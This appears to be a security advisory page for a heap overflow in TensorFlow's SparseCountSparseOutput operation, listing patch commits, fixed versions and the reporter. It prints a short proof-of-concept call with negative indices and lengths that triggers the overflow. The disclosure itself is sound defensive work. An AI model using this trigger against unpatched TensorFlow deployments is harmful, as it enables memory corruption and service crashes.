Lucene search

K
osvGoogleOSV:GHSA-44QP-9WWF-734R
HistoryFeb 09, 2022 - 11:47 p.m.

Heap overflow in Tensorflow

2022-02-0923:47:14
Google
osv.dev
14
tensorflow
heap overflow
security
fix
github commits
vulnerability
university of virginia

EPSS

0.005

Percentile

76.3%

Impact

The implementation of SparseCountSparseOutput is vulnerable to a heap overflow:

import tensorflow as tf
import numpy as np

tf.raw_ops.SparseCountSparseOutput(
  indices=[[-1,-1]],
  values=[2],
  dense_shape=[1, 1],
  weights=[1],
  binary_output=True,
  minlength=-1,
  maxlength=-1,
  name=None)

Patches

We have patched the issue in GitHub commits 2b7100d6cdff36aa21010a82269bc05a6d1cc74a and adbbabdb0d3abb3cdeac69e38a96de1d678b24b3.

The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Faysal Hossain Shezan from University of Virginia.

EPSS

0.005

Percentile

76.3%

Related for OSV:GHSA-44QP-9WWF-734R